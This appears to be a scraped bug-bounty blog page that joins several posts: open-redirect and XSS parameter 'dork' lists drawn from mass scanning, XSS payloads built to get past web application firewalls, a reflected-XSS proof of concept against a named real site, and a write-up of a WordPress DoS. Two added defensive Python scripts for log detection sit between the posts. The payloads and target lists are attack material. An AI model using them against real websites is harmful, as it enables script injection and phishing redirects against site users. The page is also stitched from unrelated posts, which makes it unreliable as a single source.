Top 100 Open Redirect dorks


Just like the previous list of XSS dorks, but this time for Open Redirect vulnerabilities.

First the most common parameters, then the parameters along with their paths.

page 19.3%
url 13.1%
ret 10.0%
r2 9.8%
img 7.0%
u 4.4%
return 2.6%
r 2.6%
URL 2.4%
next 2.0%
redirect 2.0%
redirectBack 1.6%
AuthState 1.2%
referer 0.8%
redir 0.8%
l 0.8%
aspxerrorpath 0.6%
image_path 0.6%
ActionCodeURL 0.6%
return_url 0.6%
link 0.6%
q 0.6%
location 0.6%
ReturnUrl 0.6%
uri 0.4%
referrer 0.4%
returnUrl 0.4%
forward 0.4%
file 0.4%
rb 0.4%
end_display 0.4%
urlact 0.4%
from 0.4%
goto 0.4%
path 0.4%
redirect_url 0.4%
old 0.4%
pathlocation 0.2%
successTarget 0.2%
returnURL 0.2%
urlsito 0.2%
newurl 0.2%
Url 0.2%
back 0.2%
retour 0.2%
odkazujuca_linka 0.2%
r_link 0.2%
cur_url 0.2%
H_name 0.2%
ref 0.2%
topic 0.2%
resource 0.2%
returnTo 0.2%
home 0.2%
node 0.2%
sUrl 0.2%
href 0.2%
linkurl 0.2%
returnto 0.2%
redirecturl 0.2%
SL 0.2%
st 0.2%
errorUrl 0.2%
media 0.2%
destination 0.2%
targeturl 0.2%
return_to 0.2%
cancel_url 0.2%
doc 0.2%
GO 0.2%
ReturnTo 0.2%
anything 0.2%
FileName 0.2%
logoutRedirectURL 0.2%
list 0.2%
startUrl 0.2%
service 0.2%
redirect_to 0.2%
end_url 0.2%
_next 0.2%
noSuchEntryRedirect 0.2%
context 0.2%
returnurl 0.2%
ref_url 0.2%

/?page= 18.5
/index.php?ret= 10.0
/analytics/hit.php?r2= 9.8
/api/thumbnail?img= 7.0
/e.html?u= 3.2
/actions/act_continueapplication.cfm?r= 2.4
/redirect2/?url= 2.0
/Shibboleth.sso/Logout?return= 1.2
/ui/clear-selected/?next= 1.2
/Home/Redirect?url= 1.2
/jobs/?l= 0.8
/Error.aspx?aspxerrorpath= 0.6
/r.php?u= 0.6
/services/logo_handler.ashx?image_path= 0.6
/AddProduct.aspx?ActionCodeURL= 0.6
/tools/login/default.asp?page= 0.6
/spip.php?url= 0.6
/usermanagement/mailGeneratedPassword?referer= 0.6
/?return= 0.6
/?redir= 0.6
/simplesaml/module.php/core/loginuserpass.php?AuthState= 0.6
/out.php?url= 0.6
/affiche.php?uri= 0.4
/redirector.php?url= 0.4
/cgi/set_lang?referrer= 0.4
/blog/click?url= 0.4
/site.php?url= 0.4
/download2.php?file= 0.4
/jump.php?url= 0.4
/redirect/?redirect= 0.4
/admin/track/track?redirect= 0.4
/switch.php?rb= 0.4
/php-scripts/form-handler.php?end_display= 0.4
/cg/rk/?url= 0.4
/tosite.php?url= 0.4
/cambioidioma.php?urlact= 0.4
/accueil/spip.php?url= 0.4
/IRB/sd/Rooms/RoomComponents/LoginView/GetSessionAndBack?redirectBack= 0.4
/search?q= 0.4
/default.aspx?URL= 0.4
/initiate-sso-login/?redirect_url= 0.4
/module.php/core/loginuserpass.php?AuthState= 0.4
/authentication/check_login?old= 0.4
/RedirectToDoc.aspx?URL= 0.4
/shop/bannerhit.php?url= 0.4
/acceptcookies/?ReturnUrl= 0.4
/index.php?url= 0.4
/publang?url= 0.2
/home/helperpage?url= 0.2
/widgets.aspx?url= 0.2
/_lang/en?next= 0.2
/application/en?url= 0.2
/common/topcorm.do?pathlocation= 0.2
/main/action?successTarget= 0.2
/Videos/SetCulture?returnURL= 0.2
/Localize/ChangeLang?returnUrl= 0.2
/_goToSite.asp?urlsito= 0.2
/redir?url= 0.2
/admin/auth/logined?redirect= 0.2
/linkforward?forward= 0.2
/modules/babel/redirect.php?newurl= 0.2
/umbraco/Surface/LanguageSurface/ChangeLanguage?Url= 0.2
/langswitcher.php?url= 0.2
/redirect/?url= 0.2
/i18n/i18n_user_currencies/change_currency?back= 0.2
/accessibilite/textBackUp/?retour= 0.2
/fncBox.php?url= 0.2
/all4shop-akcie.php?odkazujuca_linka= 0.2
/openurl.php?url= 0.2
/te3/out.php?u= 0.2
/utils/set_language.html?return_url= 0.2
/trigger.php?r_link= 0.2
/home/lng?cur_url= 0.2
/goto?url= 0.2
/o.php?url= 0.2
/link-master/19/follow?link= 0.2
/hack.php?H_name= 0.2
/bmad/namhoc.php?return= 0.2
/maven/stats.asp?ref= 0.2
/Main/WebHome?topic= 0.2
/bin/fusion/imsLogin?resource= 0.2
/languechange.aspx?url= 0.2
/bloques/bannerclick.php?url= 0.2
/changesiteversion-full?referer= 0.2
/out.php?link= 0.2
/bgpage?r= 0.2
/signout?returnTo= 0.2
/switch_lang.php?return_url= 0.2
/nousername.php?redir= 0.2
/i/logout?return= 0.2
/util_goto_detail_home.cfm?home= 0.2
/misc/oldmenu.html?from= 0.2
/click.php?url= 0.2
/bitrix/rdc/?goto= 0.2
/?node= 0.2
/setLanguage.php?return= 0.2
/redirect/ad?url= 0.2
/redirect.php?sUrl= 0.2
/redirect?url= 0.2
/url?url= 0.2
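
A defender-side use of the parameter list above, as an added example that is not part of the original post: it scans request targets from your own access logs for redirect-style parameters whose value resolves to a host other than your site. The site name shop.example, the sample requests and the subset of parameter names chosen are assumptions.

```python
from urllib.parse import urlsplit, parse_qsl

# Subset of the parameter names listed above, lower-cased for matching.
REDIRECT_PARAMS = {
    "page", "url", "ret", "r2", "u", "return", "r", "next", "redirect",
    "redirectback", "redir", "return_url", "returnurl", "goto", "forward",
    "redirect_url", "returnto", "return_to", "destination", "redirect_to",
}

def target_host(value):
    """Host (or bare scheme) a browser would leave the site for; None for a local path."""
    # Browsers read backslashes as slashes and drop control characters.
    v = "".join(ch for ch in value.strip().replace("\\", "/") if ch >= " ")
    try:
        parts = urlsplit(v)
        if parts.scheme and not parts.netloc:
            return parts.scheme.lower() + ":"   # javascript:, data:, slash-less https:
        return parts.hostname                   # set for http(s)://host and //host
    except ValueError:
        return "invalid"                        # malformed authority: treat as off-site

def offsite_redirects(request_url, site_hosts):
    """List (param, value, destination) for redirect-style params pointing off-site."""
    findings = []
    query = urlsplit(request_url).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() not in REDIRECT_PARAMS:
            continue
        dest = target_host(value)
        if dest is not None and dest not in site_hosts:
            findings.append((name, value, dest))
    return findings

# Constructed sample request targets for a site served as shop.example (assumed name).
SAMPLE = [
    "/index.php?ret=%2Faccount%2Forders",                    # local path: fine
    "/Home/Redirect?url=https%3A%2F%2Fshop.example%2Fcart",  # own host: fine
    "/signout?returnTo=https%3A%2F%2Fother.example%2F",      # absolute, off-site
    "/redirect/?url=%2F%2Fother.example%2Flanding",          # scheme-relative, off-site
    "/?page=%5C%5Cother.example",                            # backslash form, off-site
    "/search?q=https%3A%2F%2Fother.example",                 # not a redirect parameter
]

if __name__ == "__main__":
    for url in SAMPLE:
        for name, value, dest in offsite_redirects(url, {"shop.example"}):
            print(f"{url}: {name} -> {dest}")
```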

XSS WAF Bypassed

</script><svg onload=alert(1)> = (Error)
</script><!–><svg onload%3Da%3Dalert,b%3D1,[b].find(a)> = (OK)

</script><svg onload=alert(1)> = (Error)
</script/<K><svg onload%3Da%3Dalert,b%3D1,[b].find%26rpar;a%26%2341;> = (OK)

<a href=”javascript:alert(1)”>href</a> = (Error)
<A aAaAaAa AaAaAaA aAaA hReF%3D”%26%2301j%26%2365;v%26%2365;s%26%2399rIpT%26colon;[1].find%26lpar;al\u0%26%2348;65rt%26%2341;”>href</a> = (OK)

<input value=”testtest” onclick=”alert(1)”> = (Error)
<form><input formaction=javascript:alert(1) type=submit value=click> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src=x:alert(alt) onerror=eval(src) alt=1> = (OK)

‘-confirm(1)-‘ = (Error)
<!’/!”/\’/\”/*/-top[`con\x66irm`]`1`//><svg> = (OK)

<img src=x onerror=alert(1)> = (Error)
<img src onerror=%26emsp;prompt`${1}`> = (OK)

Thank you, and best regards!!!

Youtube : https://www.youtube.com/channel/UCyVj0erForx8gUDNAp8wzLw
Facebook : https://www.facebook.com/b4c0d
Paypal : paypal.me/Rando784

Top 100 XSS dorks

It’s the end of the year and a good time to share things with people.

After having scanned more than a million websites in order to find XSS and Open Redirect vulnerabilities, I took the time to do statistics on the most vulnerable parameters.

It can be used as a powerful dork list so let’s update your scanners and get bounties!

First, here is the list of the most vulnerable parameters along with their frequency.

Dork Frequency
q 5.5%
s 4.5%
search 1.9%
id 1.7%
lang 1.4%
keyword 1.2%
query 1.1%
page 1.0%
keywords 0.8%
year 0.8%
view 0.8%
email 0.8%
type 0.7%
name 0.7%
p 0.7%
month 0.6%
immagine 0.6%
list_type 0.5%
url 0.5%
terms 0.5%
categoryid 0.5%
key 0.5%
l 0.5%
begindate 0.4%
enddate 0.4%
categoryid2 0.4%
t 0.4%
cat 0.4%
category 0.4%
action 0.4%
bukva 0.4%
redirect_uri 0.4%
firstname 0.4%
c 0.4%
lastname 0.3%
uid 0.3%
startTime 0.3%
eventSearch 0.3%
categoryids2 0.3%
categoryids 0.3%
sort 0.3%
positiontitle 0.3%
groupid 0.3%
m 0.3%
message 0.3%
tag 0.3%
pn 0.3%
title 0.3%
orgId 0.3%
text 0.3%
handler 0.2%
myord 0.2%
myshownums 0.2%
id_site 0.2%
city 0.2%
search_query 0.2%
msg 0.2%
sortby 0.2%
produkti_po_cena 0.2%
produkti_po_ime 0.2%
mode 0.2%
CODE 0.2%
location 0.2%
v 0.2%
order 0.2%
n 0.2%
term 0.2%
start 0.2%
k 0.2%
redirect 0.2%
ref 0.2%
file 0.2%
mebel_id 0.2%
country 0.2%
from 0.1%
r 0.1%
f 0.1%
field%5B%5D 0.1%
searchScope 0.1%
state 0.1%
phone 0.1%
Itemid 0.1%
lng 0.1%
place 0.1%
bedrooms 0.1%
expand 0.1%
e 0.1%
price 0.1%
d 0.1%
path 0.1%
address 0.1%
day 0.1%
display 0.1%
a 0.1%
error 0.1%
form 0.1%
language 0.1%
mls 0.1%
kw 0.1%
u 0.1%

This second list is almost the same, but with the corresponding path:

Dork Frequency
/?s= 3.6
/search?q= 2.5
/index.php?lang= 0.6
/pplay/info_prenotazioni.asp?immagine= 0.6
/shared/lgflsearch.php?terms= 0.5
/index.php?page= 0.4
/search?query= 0.4
/en/Telefon-Cam?search= 0.4
/index.php?bukva= 0.4
/pro/events_print_setup.cfm?list_type= 0.3
/pro/events_print_setup.cfm?categoryid= 0.3
/pro/events_print_setup.cfm?categoryid2= 0.3
/?eventSearch= 0.3
/?startTime= 0.3
/pro/events_ical.cfm?categoryids= 0.3
/pro/events_ical.cfm?categoryids2= 0.3
/pro/events_print_setup.cfm?month= 0.3
/pro/events_print_setup.cfm?year= 0.3
/pro/events_print_setup.cfm?begindate= 0.3
/pro/events_print_setup.cfm?enddate= 0.3
/search?keyword= 0.3
/?q= 0.3
/search/?q= 0.3
/index.php?pn= 0.3
/?lang= 0.3
/property/search?uid= 0.3
/index.php?id= 0.3
/search?orgId= 0.3
/products?handler= 0.2
/pro/events_print_setup.cfm?view= 0.2
/pro/events_print_setup.cfm?keywords= 0.2
/?p= 0.2
/search.php?q= 0.2
/?search= 0.2
/pro/minicalendar_detail.cfm?list_type= 0.2
/index.php?produkti_po_cena= 0.2
/index.php?produkti_po_ime= 0.2
/servlet/com.jsbsoft.jtf.core.SG?CODE= 0.2
/login?redirect_uri= 0.2
/connexion?redirect_uri= 0.2
/index.php?action= 0.2
/plugins/actu/listing_actus-front.php?id_site= 0.2
/index.php?mebel_id= 0.2
/search/?search= 0.2
/news/class/index.php?myshownums= 0.2
/news/class/index.php?myord= 0.2
/search.html?searchScope= 0.1
/search?field%5B%5D= 0.1
/videos?tag= 0.1
/videos?place= 0.1
/videos?search= 0.1
/?email= 0.1
/?cat= 0.1
/content.php?expand= 0.1
/?page= 0.1
/search/?s= 0.1
/?keywords= 0.1
/search/?keyword= 0.1
/apps/email/index.jsp?n= 0.1
/?name= 0.1
/?sort= 0.1
/search?search= 0.1
/pro/minicalendar_print_setup.cfm?begindate= 0.1
/pro/minicalendar_print_setup.cfm?enddate= 0.1
/pro/minicalendar_print_setup.cfm?keywords= 0.1
/search-results?q= 0.1
/?listingtypeid= 0.1
/search?s= 0.1
/pro/minicalendar_print_setup.cfm?categoryid2= 0.1
/?bathrooms= 0.1
/?listingagent= 0.1
/?featuredsearchseourl= 0.1
/?squarefeet= 0.1
/?siteid= 0.1
/?bedrooms= 0.1
/?featuredsearch= 0.1
/?price= 0.1
/?maxbuilt= 0.1
/?lsid= 0.1
/?listingtypes= 0.1
/?garages= 0.1
/?maxprice= 0.1
/?minprice= 0.1
/?keywordsany= 0.1
/?yearbuilt= 0.1
/?minbuilt= 0.1
/?subdivision= 0.1
/?lotsizeval= 0.1
/?listingstatusid= 0.1
/?mls= 0.1
/firms/?text= 0.1
/servlet/com.jsbsoft.jtf.core.SG?OBJET= 0.1
/plan_du_site.php?lang= 0.1
/index.php?Itemid= 0.1
/?view= 0.1
/?t= 0.1
/?selat= 0.1
/?selong= 0.1
/?nwlat= 0.1
/?geo= 0.1

I hope you enjoy this 🙂

Congrats on 1000 badges OBB

Wanted to start my blog by celebrating 1000 combined honor badges by the OBB community! 🙂

Hip hip hooray!

Awesome job by the community, if only the site owners could take submitted findings more seriously! Personally, I find that a lot of alerted site owners just seem to throw the information provided in the garbage, and it makes me sad.

Good luck next year, everyone! May the hunt be bountiful!

-m00n

Reflected xss in 360totalsecurity

I have found a vulnerability in 360totalsecurity: a reflected XSS in https://blog.360totalsecurity.com

Steps to reproduce:

Go to https://blog.360totalsecurity.com

and then to: https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=Blog

and replace the utm_source value with this XSS payload: x”><svG onLoad=prompt(document.domain)>

Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>

PoC:

https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>

Regards,

TAHA

Denial of Service vulnerability in script-loader.php (CVE-2018-6389)

The load-scripts.php file receives a parameter called load[]; the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested.

What can be concluded from this URL is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and get multiple JS modules within the response.

I wondered what would happen if I sent the server a request to supply me every JS module that it stored. A single request would cause the server to perform 181 I/O actions and provide the file contents in the response.

So I tried it and sent the request to the server:

The server responded after 2.2 seconds, with almost 4MB of data, which made the server work really hard to process such a request.
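
Detection logic for the behaviour described above, as an added example that is not part of the original write-up: it reads access-log lines, counts how many distinct script handles each load-scripts.php request asks for through load[], and reports the requests above a threshold with their response size per client. The log format (combined log format), the threshold of 40, the sample lines and the placeholder handle names are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Combined log format: client, two fields, [time], "METHOD target PROTO", status, bytes
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) (\d+|-)')

def count_handles(target):
    """Distinct script handles requested via load, load[] or load[key]."""
    parts = urlsplit(target)
    if not parts.path.endswith("/load-scripts.php"):
        return 0
    handles = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.split("[", 1)[0] == "load":
            handles.update(h for h in value.split(",") if h)
    return len(handles)

def flag_bulk_loads(log_lines, max_handles=40):
    """Return (client, handle_count, response_bytes) for requests above max_handles.

    max_handles is an assumed threshold; tune it against your own admin traffic.
    """
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, _status, size = m.groups()
        n = count_handles(target)
        if n > max_handles:
            hits.append((client, n, 0 if size == "-" else int(size)))
    return hits

def bytes_by_client(hits):
    """Total response bytes served to each client by flagged requests."""
    totals = Counter()
    for client, _n, size in hits:
        totals[client] += size
    return totals

# Constructed sample log; handle-0..handle-180 are placeholders, not real module names.
BULK = ",".join(f"handle-{i}" for i in range(181))
T = "[05/Feb/2018:10:00:00 +0000]"
SAMPLE_LOG = [
    f'192.0.2.10 - - {T} "GET /wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-ui-core HTTP/1.1" 200 20731',
    f'198.51.100.7 - - {T} "GET /wp-admin/load-scripts.php?c=1&load%5B%5D={BULK} HTTP/1.1" 200 3900000',
    f'198.51.100.7 - - {T} "GET /wp-admin/load-scripts.php?load%5B%5D={BULK} HTTP/1.1" 200 3900000',
    f'192.0.2.10 - - {T} "GET /index.php?load=a,b HTTP/1.1" 200 512',
]
```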